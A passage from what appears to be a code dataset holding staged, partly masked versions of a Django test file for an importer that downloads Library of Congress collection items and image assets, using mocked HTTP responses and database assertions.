"step-3": "<mask token>\n\n\nclass GetItemIdFromItemURLTest(TestCase):\n\n def test_get_item_id_from_item_url_with_slash(self):\n \"\"\"\n Testing get item id from item url if ends with /\n \"\"\"\n url = 'https://www.loc.gov/item/mss859430021/'\n resp = get_item_id_from_item_url(url)\n self.assertEqual(resp, 'mss859430021')\n\n def test_get_item_id_from_item_url_without_slash(self):\n \"\"\"\n Testing get item id from item url if ends without /\n \"\"\"\n url = 'https://www.loc.gov/item/mss859430021'\n resp = get_item_id_from_item_url(url)\n self.assertEqual(resp, 'mss859430021')\n\n\nclass GETRequestDataTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n :return:\n \"\"\"\n self.url = 'https://www.loc.gov/item/mss859430021?fo=json'\n\n @patch('importer.tasks.requests.get')\n def test_get_request_success_json_data(self, mock_get):\n \"\"\"get data on success json data\"\"\"\n mock_resp_instance = MockResponse({'msg': 'success'}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance.json())\n\n @patch('importer.tasks.requests.get')\n def test_get_request_not_success(self, mock_get):\n \"\"\"get data on not success\"\"\"\n mock_resp_instance = MockResponse({'msg': 'bad request'}, 400)\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url)\n self.assertEqual(mock_resp_instance.status_code, 400)\n self.assertEqual(response, {})\n\n @patch('importer.tasks.requests.get')\n def test_get_request_normal_response(self, mock_get):\n \"\"\"if json false return repose object with content\"\"\"\n mock_resp_instance = MockResponse({'msg': 'success'}, 200, content=\n 'abc')\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url, json_resp=False)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance)\n\n\nclass GetCollectionPagesTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with pages info\n \"\"\"\n mock_resp_instance = MockResponse({'pagination': {'total': 10}}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_collection_pages(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 10)\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_sucess_no_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with no pages info\n \"\"\"\n mock_resp_instance = MockResponse({}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_collection_pages(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 0)\n\n\nclass GetCollectionItemidsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_item_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids available in given collection url\n \"\"\"\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n response = get_collection_item_ids(self.url, 2)\n self.assertListEqual(response, ['mss37820001'])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_item_ids_no_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids not availabel collection url\n \"\"\"\n mock_page1_result = MockResponse({}, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n response = get_collection_item_ids(self.url, 2)\n self.assertListEqual(response, [])\n\n\nclass GetCollectionItemAssetURLsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [\n 'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'\n ])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_no_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls not available in given item id\n \"\"\"\n mock_resp = MockResponse({}, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [])\n\n\nclass DownloadWriteCollcetionItemAssetTest(TestCase):\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item(self, mock_get):\n \"\"\"\n Testing download image and write into disk without error\n \"\"\"\n mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, True)\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item_error(self, mock_get):\n \"\"\"\n Testing download image with exception\n \"\"\"\n mock_resp = MockResponse({}, 200, content=Exception('boom'))\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, False)\n\n\nclass DownloadWriteCollectionItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes_no_db_entry(self,\n mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n\nclass DownloadWriteItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n",
"step-4": "<mask token>\n\n\nclass MockResponse:\n <mask token>\n <mask token>\n <mask token>\n\n def iter_content(self, chunk_size=None):\n return io.BytesIO(self.content.encode())\n\n\nclass GetItemIdFromItemURLTest(TestCase):\n\n def test_get_item_id_from_item_url_with_slash(self):\n \"\"\"\n Testing get item id from item url if ends with /\n \"\"\"\n url = 'https://www.loc.gov/item/mss859430021/'\n resp = get_item_id_from_item_url(url)\n self.assertEqual(resp, 'mss859430021')\n\n def test_get_item_id_from_item_url_without_slash(self):\n \"\"\"\n Testing get item id from item url if ends without /\n \"\"\"\n url = 'https://www.loc.gov/item/mss859430021'\n resp = get_item_id_from_item_url(url)\n self.assertEqual(resp, 'mss859430021')\n\n\nclass GETRequestDataTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n :return:\n \"\"\"\n self.url = 'https://www.loc.gov/item/mss859430021?fo=json'\n\n @patch('importer.tasks.requests.get')\n def test_get_request_success_json_data(self, mock_get):\n \"\"\"get data on success json data\"\"\"\n mock_resp_instance = MockResponse({'msg': 'success'}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance.json())\n\n @patch('importer.tasks.requests.get')\n def test_get_request_not_success(self, mock_get):\n \"\"\"get data on not success\"\"\"\n mock_resp_instance = MockResponse({'msg': 'bad request'}, 400)\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url)\n self.assertEqual(mock_resp_instance.status_code, 400)\n self.assertEqual(response, {})\n\n @patch('importer.tasks.requests.get')\n def test_get_request_normal_response(self, mock_get):\n \"\"\"if json false return repose object with content\"\"\"\n mock_resp_instance = MockResponse({'msg': 'success'}, 200, content=\n 'abc')\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url, json_resp=False)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance)\n\n\nclass GetCollectionPagesTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with pages info\n \"\"\"\n mock_resp_instance = MockResponse({'pagination': {'total': 10}}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_collection_pages(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 10)\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_sucess_no_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with no pages info\n \"\"\"\n mock_resp_instance = MockResponse({}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_collection_pages(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 0)\n\n\nclass GetCollectionItemidsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_item_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids available in given collection url\n \"\"\"\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n response = get_collection_item_ids(self.url, 2)\n self.assertListEqual(response, ['mss37820001'])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_item_ids_no_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids not availabel collection url\n \"\"\"\n mock_page1_result = MockResponse({}, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n response = get_collection_item_ids(self.url, 2)\n self.assertListEqual(response, [])\n\n\nclass GetCollectionItemAssetURLsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [\n 'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'\n ])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_no_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls not available in given item id\n \"\"\"\n mock_resp = MockResponse({}, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [])\n\n\nclass DownloadWriteCollcetionItemAssetTest(TestCase):\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item(self, mock_get):\n \"\"\"\n Testing download image and write into disk without error\n \"\"\"\n mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, True)\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item_error(self, mock_get):\n \"\"\"\n Testing download image with exception\n \"\"\"\n mock_resp = MockResponse({}, 200, content=Exception('boom'))\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, False)\n\n\nclass DownloadWriteCollectionItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes_no_db_entry(self,\n mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n\nclass DownloadWriteItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n",
"step-5": "# TODO: Add correct copyright header\n\nimport io\nfrom unittest.mock import mock_open, patch\n\nfrom django.test import TestCase\n\nfrom importer.models import *\nfrom importer.tasks import *\nfrom importer.tests import mock_data\n\n\nclass MockResponse:\n \"\"\"\n This class will be used by the mock to replace requests.get\n \"\"\"\n\n def __init__(self, json_data, status_code, content=None, reason=\" some error\"):\n self.json_data = json_data\n self.status_code = status_code\n self.reason = reason\n self.content = content\n\n def json(self):\n return self.json_data\n\n def iter_content(self, chunk_size=None):\n return io.BytesIO(self.content.encode())\n\n\nclass GetItemIdFromItemURLTest(TestCase):\n def test_get_item_id_from_item_url_with_slash(self):\n \"\"\"\n Testing get item id from item url if ends with /\n \"\"\"\n # Arrange\n url = \"https://www.loc.gov/item/mss859430021/\"\n\n # Act\n resp = get_item_id_from_item_url(url)\n\n # Assert\n self.assertEqual(resp, \"mss859430021\")\n\n def test_get_item_id_from_item_url_without_slash(self):\n \"\"\"\n Testing get item id from item url if ends without /\n \"\"\"\n # Arrange\n url = \"https://www.loc.gov/item/mss859430021\"\n\n # Act\n resp = get_item_id_from_item_url(url)\n\n # Assert\n self.assertEqual(resp, \"mss859430021\")\n\n\nclass GETRequestDataTest(TestCase):\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n :return:\n \"\"\"\n self.url = \"https://www.loc.gov/item/mss859430021?fo=json\"\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_request_success_json_data(self, mock_get):\n \"\"\"get data on success json data\"\"\"\n\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({\"msg\": \"success\"}, 200)\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_request_data(self.url)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance.json())\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_request_not_success(self, mock_get):\n \"\"\"get data on not success\"\"\"\n\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({\"msg\": \"bad request\"}, 400)\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_request_data(self.url)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 400)\n self.assertEqual(response, {})\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_request_normal_response(self, mock_get):\n \"\"\"if json false return repose object with content\"\"\"\n\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({\"msg\": \"success\"}, 200, content=\"abc\")\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_request_data(self.url, json_resp=False)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance)\n\n\nclass GetCollectionPagesTest(TestCase):\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = \"https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971\"\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_collection_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with pages info\n \"\"\"\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({\"pagination\": {\"total\": 10}}, 200)\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_collection_pages(self.url)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 10)\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_collection_sucess_no_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with no pages info\n \"\"\"\n\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({}, 200)\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_collection_pages(self.url)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 0)\n\n\nclass GetCollectionItemidsTest(TestCase):\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = \"https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971\"\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_collection_item_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids available in given collection url\n \"\"\"\n # Arrange\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n\n # Act\n response = get_collection_item_ids(self.url, 2)\n\n # Assert\n self.assertListEqual(response, [\"mss37820001\"])\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_collection_item_ids_no_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids not availabel collection url\n \"\"\"\n # Arrange\n mock_page1_result = MockResponse({}, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n\n # Act\n response = get_collection_item_ids(self.url, 2)\n\n # Arrange\n self.assertListEqual(response, [])\n\n\nclass GetCollectionItemAssetURLsTest(TestCase):\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.item_id = \"mss37820001\"\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_collection_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n # Arrange\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n\n # Act\n response = get_collection_item_asset_urls(self.item_id)\n\n # Assert\n self.assertListEqual(\n response,\n [\n \"http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg\"\n ],\n )\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_collection_no_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls not available in given item id\n \"\"\"\n # Arrange\n mock_resp = MockResponse({}, 200)\n mock_get.return_value = mock_resp\n\n # Act\n response = get_collection_item_asset_urls(self.item_id)\n\n # Assert\n self.assertListEqual(response, [])\n\n\nclass DownloadWriteCollcetionItemAssetTest(TestCase):\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_download_write_asset_item(self, mock_get):\n \"\"\"\n Testing download image and write into disk without error\n \"\"\"\n # Arrange\n mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)\n mock_get.return_value = mock_resp\n m = mock_open()\n\n with patch(\"__main__.open\", m, create=True):\n\n # Act\n abc = download_write_collection_item_asset(\"dumy/image/url\", \"foo\")\n\n # Assert\n self.assertEquals(abc, True)\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_download_write_asset_item_error(self, mock_get):\n \"\"\"\n Testing download image with exception\n \"\"\"\n # Arrange\n mock_resp = MockResponse({}, 200, content=Exception(\"boom\"))\n mock_get.return_value = mock_resp\n m = mock_open()\n\n with patch(\"__main__.open\", m, create=True):\n\n # Act\n abc = download_write_collection_item_asset(\"dumy/image/url\", \"foo\")\n\n # Assert\n self.assertEquals(abc, False)\n\n\nclass DownloadWriteCollectionItemAssetsTest(TestCase):\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = \"branch-rickey-papers\"\n self.project = \"test-project\"\n self.item_id = \"mss37820001\"\n self.url = \"https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971\"\n\n @patch(\"importer.tasks.get_save_item_assets\")\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_download_write_collection_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url\n \"\"\"\n # Arrange\n\n collection = {\n \"collection_name\": self.name,\n \"collection_slug\": slugify(self.name),\n \"collection_task_id\": \"123\",\n \"subcollection_name\": self.project,\n \"subcollection_slug\": slugify(self.project),\n }\n CollectionTaskDetails.objects.create(**collection)\n\n mock_resp_page = MockResponse({\"pagination\": {\"total\": 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [\n mock_resp_page,\n mock_page1_result,\n mock_page2_result,\n mock_resp_item_urls,\n ]\n mock_save.return_value = None\n\n # Act\n download_write_collection_item_assets(self.name, self.project, self.url)\n\n ctd = 